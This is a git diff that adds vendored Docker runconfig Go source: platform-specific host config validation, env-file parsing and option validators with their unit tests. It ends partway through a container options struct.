hc.NetworkMode = container.NetworkMode("default") + } + } + return hc +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go b/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go new file mode 100644 index 0000000000..83ad32ecc7 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go @@ -0,0 +1,41 @@ +package runconfig + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/sysinfo" +) + +// DefaultDaemonNetworkMode returns the default network stack the daemon should +// use. 
+func DefaultDaemonNetworkMode() container.NetworkMode { + return container.NetworkMode("bridge") +} + +// IsPreDefinedNetwork indicates if a network is predefined by the daemon +func IsPreDefinedNetwork(network string) bool { + return false +} + +// ValidateNetMode ensures that the various combinations of requested +// network settings are valid. +func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + return nil +} + +// ValidateIsolation performs platform specific validation of the +// isolation level in the hostconfig structure. +// This setting is currently discarded for Solaris so this is a no-op. +func ValidateIsolation(hc *container.HostConfig) error { + return nil +} + +// ValidateQoS performs platform specific validation of the QoS settings +func ValidateQoS(hc *container.HostConfig) error { + return nil +} + +// ValidateResources performs platform specific validation of the resource settings +func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { + return nil +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_test.go b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go new file mode 100644 index 0000000000..a6a2b34fc1 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go @@ -0,0 +1,283 @@ +// +build !windows + +package runconfig + +import ( + "bytes" + "fmt" + "io/ioutil" + "testing" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/sysinfo" +) + +// TODO Windows: This will need addressing for a Windows daemon. 
+func TestNetworkModeTest(t *testing.T) { + networkModes := map[container.NetworkMode][]bool{ + // private, bridge, host, container, none, default + "": {true, false, false, false, false, false}, + "something:weird": {true, false, false, false, false, false}, + "bridge": {true, true, false, false, false, false}, + DefaultDaemonNetworkMode(): {true, true, false, false, false, false}, + "host": {false, false, true, false, false, false}, + "container:name": {false, false, false, true, false, false}, + "none": {true, false, false, false, true, false}, + "default": {true, false, false, false, false, true}, + } + networkModeNames := map[container.NetworkMode]string{ + "": "", + "something:weird": "something:weird", + "bridge": "bridge", + DefaultDaemonNetworkMode(): "bridge", + "host": "host", + "container:name": "container", + "none": "none", + "default": "default", + } + for networkMode, state := range networkModes { + if networkMode.IsPrivate() != state[0] { + t.Fatalf("NetworkMode.IsPrivate for %v should have been %v but was %v", networkMode, state[0], networkMode.IsPrivate()) + } + if networkMode.IsBridge() != state[1] { + t.Fatalf("NetworkMode.IsBridge for %v should have been %v but was %v", networkMode, state[1], networkMode.IsBridge()) + } + if networkMode.IsHost() != state[2] { + t.Fatalf("NetworkMode.IsHost for %v should have been %v but was %v", networkMode, state[2], networkMode.IsHost()) + } + if networkMode.IsContainer() != state[3] { + t.Fatalf("NetworkMode.IsContainer for %v should have been %v but was %v", networkMode, state[3], networkMode.IsContainer()) + } + if networkMode.IsNone() != state[4] { + t.Fatalf("NetworkMode.IsNone for %v should have been %v but was %v", networkMode, state[4], networkMode.IsNone()) + } + if networkMode.IsDefault() != state[5] { + t.Fatalf("NetworkMode.IsDefault for %v should have been %v but was %v", networkMode, state[5], networkMode.IsDefault()) + } + if networkMode.NetworkName() != networkModeNames[networkMode] { + 
t.Fatalf("Expected name %v, got %v", networkModeNames[networkMode], networkMode.NetworkName()) + } + } +} + +func TestIpcModeTest(t *testing.T) { + ipcModes := map[container.IpcMode][]bool{ + // private, host, container, valid + "": {true, false, false, true}, + "something:weird": {true, false, false, false}, + ":weird": {true, false, false, true}, + "host": {false, true, false, true}, + "container:name": {false, false, true, true}, + "container:name:something": {false, false, true, false}, + "container:": {false, false, true, false}, + } + for ipcMode, state := range ipcModes { + if ipcMode.IsPrivate() != state[0] { + t.Fatalf("IpcMode.IsPrivate for %v should have been %v but was %v", ipcMode, state[0], ipcMode.IsPrivate()) + } + if ipcMode.IsHost() != state[1] { + t.Fatalf("IpcMode.IsHost for %v should have been %v but was %v", ipcMode, state[1], ipcMode.IsHost()) + } + if ipcMode.IsContainer() != state[2] { + t.Fatalf("IpcMode.IsContainer for %v should have been %v but was %v", ipcMode, state[2], ipcMode.IsContainer()) + } + if ipcMode.Valid() != state[3] { + t.Fatalf("IpcMode.Valid for %v should have been %v but was %v", ipcMode, state[3], ipcMode.Valid()) + } + } + containerIpcModes := map[container.IpcMode]string{ + "": "", + "something": "", + "something:weird": "weird", + "container": "", + "container:": "", + "container:name": "name", + "container:name1:name2": "name1:name2", + } + for ipcMode, container := range containerIpcModes { + if ipcMode.Container() != container { + t.Fatalf("Expected %v for %v but was %v", container, ipcMode, ipcMode.Container()) + } + } +} + +func TestUTSModeTest(t *testing.T) { + utsModes := map[container.UTSMode][]bool{ + // private, host, valid + "": {true, false, true}, + "something:weird": {true, false, false}, + "host": {false, true, true}, + "host:name": {true, false, true}, + } + for utsMode, state := range utsModes { + if utsMode.IsPrivate() != state[0] { + t.Fatalf("UtsMode.IsPrivate for %v should have been %v but was 
%v", utsMode, state[0], utsMode.IsPrivate()) + } + if utsMode.IsHost() != state[1] { + t.Fatalf("UtsMode.IsHost for %v should have been %v but was %v", utsMode, state[1], utsMode.IsHost()) + } + if utsMode.Valid() != state[2] { + t.Fatalf("UtsMode.Valid for %v should have been %v but was %v", utsMode, state[2], utsMode.Valid()) + } + } +} + +func TestUsernsModeTest(t *testing.T) { + usrensMode := map[container.UsernsMode][]bool{ + // private, host, valid + "": {true, false, true}, + "something:weird": {true, false, false}, + "host": {false, true, true}, + "host:name": {true, false, true}, + } + for usernsMode, state := range usrensMode { + if usernsMode.IsPrivate() != state[0] { + t.Fatalf("UsernsMode.IsPrivate for %v should have been %v but was %v", usernsMode, state[0], usernsMode.IsPrivate()) + } + if usernsMode.IsHost() != state[1] { + t.Fatalf("UsernsMode.IsHost for %v should have been %v but was %v", usernsMode, state[1], usernsMode.IsHost()) + } + if usernsMode.Valid() != state[2] { + t.Fatalf("UsernsMode.Valid for %v should have been %v but was %v", usernsMode, state[2], usernsMode.Valid()) + } + } +} + +func TestPidModeTest(t *testing.T) { + pidModes := map[container.PidMode][]bool{ + // private, host, valid + "": {true, false, true}, + "something:weird": {true, false, false}, + "host": {false, true, true}, + "host:name": {true, false, true}, + } + for pidMode, state := range pidModes { + if pidMode.IsPrivate() != state[0] { + t.Fatalf("PidMode.IsPrivate for %v should have been %v but was %v", pidMode, state[0], pidMode.IsPrivate()) + } + if pidMode.IsHost() != state[1] { + t.Fatalf("PidMode.IsHost for %v should have been %v but was %v", pidMode, state[1], pidMode.IsHost()) + } + if pidMode.Valid() != state[2] { + t.Fatalf("PidMode.Valid for %v should have been %v but was %v", pidMode, state[2], pidMode.Valid()) + } + } +} + +func TestRestartPolicy(t *testing.T) { + restartPolicies := map[container.RestartPolicy][]bool{ + // none, always, failure + 
container.RestartPolicy{}: {true, false, false}, + container.RestartPolicy{"something", 0}: {false, false, false}, + container.RestartPolicy{"no", 0}: {true, false, false}, + container.RestartPolicy{"always", 0}: {false, true, false}, + container.RestartPolicy{"on-failure", 0}: {false, false, true}, + } + for restartPolicy, state := range restartPolicies { + if restartPolicy.IsNone() != state[0] { + t.Fatalf("RestartPolicy.IsNone for %v should have been %v but was %v", restartPolicy, state[0], restartPolicy.IsNone()) + } + if restartPolicy.IsAlways() != state[1] { + t.Fatalf("RestartPolicy.IsAlways for %v should have been %v but was %v", restartPolicy, state[1], restartPolicy.IsAlways()) + } + if restartPolicy.IsOnFailure() != state[2] { + t.Fatalf("RestartPolicy.IsOnFailure for %v should have been %v but was %v", restartPolicy, state[2], restartPolicy.IsOnFailure()) + } + } +} +func TestDecodeHostConfig(t *testing.T) { + fixtures := []struct { + file string + }{ + {"fixtures/unix/container_hostconfig_1_14.json"}, + {"fixtures/unix/container_hostconfig_1_19.json"}, + } + + for _, f := range fixtures { + b, err := ioutil.ReadFile(f.file) + if err != nil { + t.Fatal(err) + } + + c, err := DecodeHostConfig(bytes.NewReader(b)) + if err != nil { + t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err)) + } + + if c.Privileged != false { + t.Fatalf("Expected privileged false, found %v\n", c.Privileged) + } + + if l := len(c.Binds); l != 1 { + t.Fatalf("Expected 1 bind, found %d\n", l) + } + + if len(c.CapAdd) != 1 && c.CapAdd[0] != "NET_ADMIN" { + t.Fatalf("Expected CapAdd NET_ADMIN, got %v", c.CapAdd) + } + + if len(c.CapDrop) != 1 && c.CapDrop[0] != "NET_ADMIN" { + t.Fatalf("Expected CapDrop MKNOD, got %v", c.CapDrop) + } + } +} + +func TestValidateResources(t *testing.T) { + type resourceTest struct { + ConfigCPURealtimePeriod int64 + ConfigCPURealtimeRuntime int64 + SysInfoCPURealtimePeriod bool + SysInfoCPURealtimeRuntime bool + ErrorExpected bool + FailureMsg string + 
} + + tests := []resourceTest{ + { + ConfigCPURealtimePeriod: 1000, + ConfigCPURealtimeRuntime: 1000, + SysInfoCPURealtimePeriod: true, + SysInfoCPURealtimeRuntime: true, + ErrorExpected: false, + FailureMsg: "Expected valid configuration", + }, + { + ConfigCPURealtimePeriod: 5000, + ConfigCPURealtimeRuntime: 5000, + SysInfoCPURealtimePeriod: false, + SysInfoCPURealtimeRuntime: true, + ErrorExpected: true, + FailureMsg: "Expected failure when cpu-rt-period is set but kernel doesn't support it", + }, + { + ConfigCPURealtimePeriod: 5000, + ConfigCPURealtimeRuntime: 5000, + SysInfoCPURealtimePeriod: true, + SysInfoCPURealtimeRuntime: false, + ErrorExpected: true, + FailureMsg: "Expected failure when cpu-rt-runtime is set but kernel doesn't support it", + }, + { + ConfigCPURealtimePeriod: 5000, + ConfigCPURealtimeRuntime: 10000, + SysInfoCPURealtimePeriod: true, + SysInfoCPURealtimeRuntime: false, + ErrorExpected: true, + FailureMsg: "Expected failure when cpu-rt-runtime is greater than cpu-rt-period", + }, + } + + for _, rt := range tests { + var hc container.HostConfig + hc.Resources.CPURealtimePeriod = rt.ConfigCPURealtimePeriod + hc.Resources.CPURealtimeRuntime = rt.ConfigCPURealtimeRuntime + + var si sysinfo.SysInfo + si.CPURealtimePeriod = rt.SysInfoCPURealtimePeriod + si.CPURealtimeRuntime = rt.SysInfoCPURealtimeRuntime + + if err := ValidateResources(&hc, &si); (err != nil) != rt.ErrorExpected { + t.Fatal(rt.FailureMsg, err) + } + } +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go new file mode 100644 index 0000000000..6e2b7f5ff7 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go @@ -0,0 +1,129 @@ +// +build !windows,!solaris + +package runconfig + +import ( + "fmt" + "runtime" + "strings" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/sysinfo" +) + +// DefaultDaemonNetworkMode returns the default network 
stack the daemon should +// use. +func DefaultDaemonNetworkMode() container.NetworkMode { + return container.NetworkMode("bridge") +} + +// IsPreDefinedNetwork indicates if a network is predefined by the daemon +func IsPreDefinedNetwork(network string) bool { + n := container.NetworkMode(network) + return n.IsBridge() || n.IsHost() || n.IsNone() || n.IsDefault() || network == "ingress" +} + +// ValidateNetMode ensures that the various combinations of requested +// network settings are valid. +func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + parts := strings.Split(string(hc.NetworkMode), ":") + if parts[0] == "container" { + if len(parts) < 2 || parts[1] == "" { + return fmt.Errorf("--net: invalid net mode: invalid container format container:") + } + } + + if hc.NetworkMode.IsContainer() && c.Hostname != "" { + return ErrConflictNetworkHostname + } + + if hc.UTSMode.IsHost() && c.Hostname != "" { + return ErrConflictUTSHostname + } + + if hc.NetworkMode.IsHost() && len(hc.Links) > 0 { + return ErrConflictHostNetworkAndLinks + } + + if hc.NetworkMode.IsContainer() && len(hc.Links) > 0 { + return ErrConflictContainerNetworkAndLinks + } + + if hc.NetworkMode.IsContainer() && len(hc.DNS) > 0 { + return ErrConflictNetworkAndDNS + } + + if hc.NetworkMode.IsContainer() && len(hc.ExtraHosts) > 0 { + return ErrConflictNetworkHosts + } + + if (hc.NetworkMode.IsContainer() || hc.NetworkMode.IsHost()) && c.MacAddress != "" { + return ErrConflictContainerNetworkAndMac + } + + if hc.NetworkMode.IsContainer() && (len(hc.PortBindings) > 0 || hc.PublishAllPorts == true) { + return ErrConflictNetworkPublishPorts + } + + if hc.NetworkMode.IsContainer() && len(c.ExposedPorts) > 0 { + return ErrConflictNetworkExposePorts + } + return nil +} + +// ValidateIsolation performs platform specific validation of +// isolation in the hostconfig structure. 
Linux only supports "default" +// which is LXC container isolation +func ValidateIsolation(hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + if !hc.Isolation.IsValid() { + return fmt.Errorf("invalid --isolation: %q - %s only supports 'default'", hc.Isolation, runtime.GOOS) + } + return nil +} + +// ValidateQoS performs platform specific validation of the QoS settings +func ValidateQoS(hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + + if hc.IOMaximumBandwidth != 0 { + return fmt.Errorf("invalid QoS settings: %s does not support --io-maxbandwidth", runtime.GOOS) + } + + if hc.IOMaximumIOps != 0 { + return fmt.Errorf("invalid QoS settings: %s does not support --io-maxiops", runtime.GOOS) + } + return nil +} + +// ValidateResources performs platform specific validation of the resource settings +// cpu-rt-runtime and cpu-rt-period can not be greater than their parent, cpu-rt-runtime requires sys_nice +func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + + if hc.Resources.CPURealtimePeriod > 0 && !si.CPURealtimePeriod { + return fmt.Errorf("invalid --cpu-rt-period: Your kernel does not support cgroup rt period") + } + + if hc.Resources.CPURealtimeRuntime > 0 && !si.CPURealtimeRuntime { + return fmt.Errorf("invalid --cpu-rt-runtime: Your kernel does not support cgroup rt runtime") + } + + if hc.Resources.CPURealtimePeriod != 0 && hc.Resources.CPURealtimeRuntime != 0 && hc.Resources.CPURealtimeRuntime > hc.Resources.CPURealtimePeriod { + return fmt.Errorf("invalid --cpu-rt-runtime: rt runtime cannot be higher than rt period") + } + return nil +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go 
b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go new file mode 100644 index 0000000000..91bd6dcc3c --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go @@ -0,0 +1,68 @@ +package runconfig + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/sysinfo" +) + +// DefaultDaemonNetworkMode returns the default network stack the daemon should +// use. +func DefaultDaemonNetworkMode() container.NetworkMode { + return container.NetworkMode("nat") +} + +// IsPreDefinedNetwork indicates if a network is predefined by the daemon +func IsPreDefinedNetwork(network string) bool { + return !container.NetworkMode(network).IsUserDefined() +} + +// ValidateNetMode ensures that the various combinations of requested +// network settings are valid. +func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { + if hc == nil { + return nil + } + parts := strings.Split(string(hc.NetworkMode), ":") + if len(parts) > 1 { + return fmt.Errorf("invalid --net: %s", hc.NetworkMode) + } + return nil +} + +// ValidateIsolation performs platform specific validation of the +// isolation in the hostconfig structure. Windows supports 'default' (or +// blank), 'process', or 'hyperv'. +func ValidateIsolation(hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + if !hc.Isolation.IsValid() { + return fmt.Errorf("invalid --isolation: %q. 
Windows supports 'default', 'process', or 'hyperv'", hc.Isolation) + } + return nil +} + +// ValidateQoS performs platform specific validation of the Qos settings +func ValidateQoS(hc *container.HostConfig) error { + return nil +} + +// ValidateResources performs platform specific validation of the resource settings +func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + + if hc.Resources.CPURealtimePeriod != 0 { + return fmt.Errorf("invalid --cpu-rt-period: Windows does not support this feature") + } + if hc.Resources.CPURealtimeRuntime != 0 { + return fmt.Errorf("invalid --cpu-rt-runtime: Windows does not support this feature") + } + return nil +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile.go b/vendor/github.com/docker/docker/runconfig/opts/envfile.go new file mode 100644 index 0000000000..f723799215 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/envfile.go @@ -0,0 +1,81 @@ +package opts + +import ( + "bufio" + "bytes" + "fmt" + "os" + "strings" + "unicode" + "unicode/utf8" +) + +// ParseEnvFile reads a file with environment variables enumerated by lines +// +// ``Environment variable names used by the utilities in the Shell and +// Utilities volume of IEEE Std 1003.1-2001 consist solely of uppercase +// letters, digits, and the '_' (underscore) from the characters defined in +// Portable Character Set and do not begin with a digit. *But*, other +// characters may be permitted by an implementation; applications shall +// tolerate the presence of such names.'' +// -- http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap08.html +// +// As of #16585, it's up to application inside docker to validate or not +// environment variables, that's why we just strip leading whitespace and +// nothing more. 
+func ParseEnvFile(filename string) ([]string, error) { + fh, err := os.Open(filename) + if err != nil { + return []string{}, err + } + defer fh.Close() + + lines := []string{} + scanner := bufio.NewScanner(fh) + currentLine := 0 + utf8bom := []byte{0xEF, 0xBB, 0xBF} + for scanner.Scan() { + scannedBytes := scanner.Bytes() + if !utf8.Valid(scannedBytes) { + return []string{}, fmt.Errorf("env file %s contains invalid utf8 bytes at line %d: %v", filename, currentLine+1, scannedBytes) + } + // We trim UTF8 BOM + if currentLine == 0 { + scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom) + } + // trim the line from all leading whitespace first + line := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace) + currentLine++ + // line is not empty, and not starting with '#' + if len(line) > 0 && !strings.HasPrefix(line, "#") { + data := strings.SplitN(line, "=", 2) + + // trim the front of a variable, but nothing else + variable := strings.TrimLeft(data[0], whiteSpaces) + if strings.ContainsAny(variable, whiteSpaces) { + return []string{}, ErrBadEnvVariable{fmt.Sprintf("variable '%s' has white spaces", variable)} + } + + if len(data) > 1 { + + // pass the value through, no trimming + lines = append(lines, fmt.Sprintf("%s=%s", variable, data[1])) + } else { + // if only a pass-through variable is given, clean it up. 
+ lines = append(lines, fmt.Sprintf("%s=%s", strings.TrimSpace(line), os.Getenv(line))) + } + } + } + return lines, scanner.Err() +} + +var whiteSpaces = " \t" + +// ErrBadEnvVariable typed error for bad environment variable +type ErrBadEnvVariable struct { + msg string +} + +func (e ErrBadEnvVariable) Error() string { + return fmt.Sprintf("poorly formatted environment: %s", e.msg) +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go b/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go new file mode 100644 index 0000000000..5dd7078bc0 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go @@ -0,0 +1,142 @@ +package opts + +import ( + "bufio" + "fmt" + "io/ioutil" + "os" + "reflect" + "strings" + "testing" +) + +func tmpFileWithContent(content string, t *testing.T) string { + tmpFile, err := ioutil.TempFile("", "envfile-test") + if err != nil { + t.Fatal(err) + } + defer tmpFile.Close() + + tmpFile.WriteString(content) + return tmpFile.Name() +} + +// Test ParseEnvFile for a file with a few well formatted lines +func TestParseEnvFileGoodFile(t *testing.T) { + content := `foo=bar + baz=quux +# comment + +_foobar=foobaz +with.dots=working +and_underscore=working too +` + // Adding a newline + a line with pure whitespace. + // This is being done like this instead of the block above + // because it's common for editors to trim trailing whitespace + // from lines, which becomes annoying since that's the + // exact thing we need to test. 
+ content += "\n \t " + tmpFile := tmpFileWithContent(content, t) + defer os.Remove(tmpFile) + + lines, err := ParseEnvFile(tmpFile) + if err != nil { + t.Fatal(err) + } + + expectedLines := []string{ + "foo=bar", + "baz=quux", + "_foobar=foobaz", + "with.dots=working", + "and_underscore=working too", + } + + if !reflect.DeepEqual(lines, expectedLines) { + t.Fatal("lines not equal to expected_lines") + } +} + +// Test ParseEnvFile for an empty file +func TestParseEnvFileEmptyFile(t *testing.T) { + tmpFile := tmpFileWithContent("", t) + defer os.Remove(tmpFile) + + lines, err := ParseEnvFile(tmpFile) + if err != nil { + t.Fatal(err) + } + + if len(lines) != 0 { + t.Fatal("lines not empty; expected empty") + } +} + +// Test ParseEnvFile for a non existent file +func TestParseEnvFileNonExistentFile(t *testing.T) { + _, err := ParseEnvFile("foo_bar_baz") + if err == nil { + t.Fatal("ParseEnvFile succeeded; expected failure") + } + if _, ok := err.(*os.PathError); !ok { + t.Fatalf("Expected a PathError, got [%v]", err) + } +} + +// Test ParseEnvFile for a badly formatted file +func TestParseEnvFileBadlyFormattedFile(t *testing.T) { + content := `foo=bar + f =quux +` + + tmpFile := tmpFileWithContent(content, t) + defer os.Remove(tmpFile) + + _, err := ParseEnvFile(tmpFile) + if err == nil { + t.Fatalf("Expected an ErrBadEnvVariable, got nothing") + } + if _, ok := err.(ErrBadEnvVariable); !ok { + t.Fatalf("Expected an ErrBadEnvVariable, got [%v]", err) + } + expectedMessage := "poorly formatted environment: variable 'f ' has white spaces" + if err.Error() != expectedMessage { + t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error()) + } +} + +// Test ParseEnvFile for a file with a line exceeding bufio.MaxScanTokenSize +func TestParseEnvFileLineTooLongFile(t *testing.T) { + content := strings.Repeat("a", bufio.MaxScanTokenSize+42) + content = fmt.Sprint("foo=", content) + + tmpFile := tmpFileWithContent(content, t) + defer os.Remove(tmpFile) + + _, err := 
ParseEnvFile(tmpFile) + if err == nil { + t.Fatal("ParseEnvFile succeeded; expected failure") + } +} + +// ParseEnvFile with a random file, pass through +func TestParseEnvFileRandomFile(t *testing.T) { + content := `first line +another invalid line` + tmpFile := tmpFileWithContent(content, t) + defer os.Remove(tmpFile) + + _, err := ParseEnvFile(tmpFile) + + if err == nil { + t.Fatalf("Expected an ErrBadEnvVariable, got nothing") + } + if _, ok := err.(ErrBadEnvVariable); !ok { + t.Fatalf("Expected an ErrBadEnvvariable, got [%v]", err) + } + expectedMessage := "poorly formatted environment: variable 'first line' has white spaces" + if err.Error() != expectedMessage { + t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error()) + } +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env new file mode 100755 index 0000000000000000000000000000000000000000..3a73358fffbc0d5d3d4df985ccf2f4a1a29cdb2a GIT binary patch literal 54 ucmezW&yB$!2yGdh7#tab7 1 { + return val, nil + } + if !doesEnvExist(val) { + return val, nil + } + return fmt.Sprintf("%s=%s", val, os.Getenv(val)), nil +} + +func doesEnvExist(name string) bool { + for _, entry := range os.Environ() { + parts := strings.SplitN(entry, "=", 2) + if runtime.GOOS == "windows" { + // Environment variable are case-insensitive on Windows. PaTh, path and PATH are equivalent. + if strings.EqualFold(parts[0], name) { + return true + } + } + if parts[0] == name { + return true + } + } + return false +} + +// ValidateExtraHost validates that the specified string is a valid extrahost and returns it. +// ExtraHost is in the form of name:ip where the ip has to be a valid ip (IPv4 or IPv6). 
+func ValidateExtraHost(val string) (string, error) { + // allow for IPv6 addresses in extra hosts by only splitting on first ":" + arr := strings.SplitN(val, ":", 2) + if len(arr) != 2 || len(arr[0]) == 0 { + return "", fmt.Errorf("bad format for add-host: %q", val) + } + if _, err := fopts.ValidateIPAddress(arr[1]); err != nil { + return "", fmt.Errorf("invalid IP address in add-host: %q", arr[1]) + } + return val, nil +} + +// ValidateMACAddress validates a MAC address. +func ValidateMACAddress(val string) (string, error) { + _, err := net.ParseMAC(strings.TrimSpace(val)) + if err != nil { + return "", err + } + return val, nil +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/opts_test.go b/vendor/github.com/docker/docker/runconfig/opts/opts_test.go new file mode 100644 index 0000000000..43f8730fc4 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/opts_test.go @@ -0,0 +1,113 @@ +package opts + +import ( + "fmt" + "os" + "runtime" + "strings" + "testing" +) + +func TestValidateAttach(t *testing.T) { + valid := []string{ + "stdin", + "stdout", + "stderr", + "STDIN", + "STDOUT", + "STDERR", + } + if _, err := ValidateAttach("invalid"); err == nil { + t.Fatalf("Expected error with [valid streams are STDIN, STDOUT and STDERR], got nothing") + } + + for _, attach := range valid { + value, err := ValidateAttach(attach) + if err != nil { + t.Fatal(err) + } + if value != strings.ToLower(attach) { + t.Fatalf("Expected [%v], got [%v]", attach, value) + } + } +} + +func TestValidateEnv(t *testing.T) { + valids := map[string]string{ + "a": "a", + "something": "something", + "_=a": "_=a", + "env1=value1": "env1=value1", + "_env1=value1": "_env1=value1", + "env2=value2=value3": "env2=value2=value3", + "env3=abc!qwe": "env3=abc!qwe", + "env_4=value 4": "env_4=value 4", + "PATH": fmt.Sprintf("PATH=%v", os.Getenv("PATH")), + "PATH=something": "PATH=something", + "asd!qwe": "asd!qwe", + "1asd": "1asd", + "123": "123", + "some space": "some space", + 
" some space before": " some space before", + "some space after ": "some space after ", + } + // Environment variables are case in-sensitive on Windows + if runtime.GOOS == "windows" { + valids["PaTh"] = fmt.Sprintf("PaTh=%v", os.Getenv("PATH")) + } + for value, expected := range valids { + actual, err := ValidateEnv(value) + if err != nil { + t.Fatal(err) + } + if actual != expected { + t.Fatalf("Expected [%v], got [%v]", expected, actual) + } + } +} + +func TestValidateExtraHosts(t *testing.T) { + valid := []string{ + `myhost:192.168.0.1`, + `thathost:10.0.2.1`, + `anipv6host:2003:ab34:e::1`, + `ipv6local:::1`, + } + + invalid := map[string]string{ + `myhost:192.notanipaddress.1`: `invalid IP`, + `thathost-nosemicolon10.0.0.1`: `bad format`, + `anipv6host:::::1`: `invalid IP`, + `ipv6local:::0::`: `invalid IP`, + } + + for _, extrahost := range valid { + if _, err := ValidateExtraHost(extrahost); err != nil { + t.Fatalf("ValidateExtraHost(`"+extrahost+"`) should succeed: error %v", err) + } + } + + for extraHost, expectedError := range invalid { + if _, err := ValidateExtraHost(extraHost); err == nil { + t.Fatalf("ValidateExtraHost(`%q`) should have failed validation", extraHost) + } else { + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("ValidateExtraHost(`%q`) error should contain %q", extraHost, expectedError) + } + } + } +} + +func TestValidateMACAddress(t *testing.T) { + if _, err := ValidateMACAddress(`92:d0:c6:0a:29:33`); err != nil { + t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:29:33`) got %s", err) + } + + if _, err := ValidateMACAddress(`92:d0:c6:0a:33`); err == nil { + t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:33`) succeeded; expected failure on invalid MAC") + } + + if _, err := ValidateMACAddress(`random invalid string`); err == nil { + t.Fatalf("ValidateMACAddress(`random invalid string`) succeeded; expected failure on invalid MAC") + } +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse.go 
b/vendor/github.com/docker/docker/runconfig/opts/parse.go new file mode 100644 index 0000000000..71a89277ec --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/parse.go @@ -0,0 +1,995 @@ +package opts + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "path" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/signal" + "github.com/docker/go-connections/nat" + units "github.com/docker/go-units" + "github.com/spf13/pflag" +) + +// ContainerOptions is a data object with all the options for creating a container +type ContainerOptions struct { + attach opts.ListOpts + volumes opts.ListOpts + tmpfs opts.ListOpts + blkioWeightDevice WeightdeviceOpt + deviceReadBps ThrottledeviceOpt + deviceWriteBps ThrottledeviceOpt + links opts.ListOpts + aliases opts.ListOpts + linkLocalIPs opts.ListOpts + deviceReadIOps ThrottledeviceOpt + deviceWriteIOps ThrottledeviceOpt + env opts.ListOpts + labels opts.ListOpts + devices opts.ListOpts + ulimits *UlimitOpt + sysctls *opts.MapOpts + publish opts.ListOpts + expose opts.ListOpts + dns opts.ListOpts + dnsSearch opts.ListOpts + dnsOptions opts.ListOpts + extraHosts opts.ListOpts + volumesFrom opts.ListOpts + envFile opts.ListOpts + capAdd opts.ListOpts + capDrop opts.ListOpts + groupAdd opts.ListOpts + securityOpt opts.ListOpts + storageOpt opts.ListOpts + labelsFile opts.ListOpts + loggingOpts opts.ListOpts + privileged bool + pidMode string + utsMode string + usernsMode string + publishAll bool + stdin bool + tty bool + oomKillDisable bool + oomScoreAdj int + containerIDFile string + entrypoint string + hostname string + memoryString string + memoryReservation string + memorySwap string + kernelMemory string + user string + workingDir string + cpuCount int64 + cpuShares int64 + cpuPercent int64 + cpuPeriod 
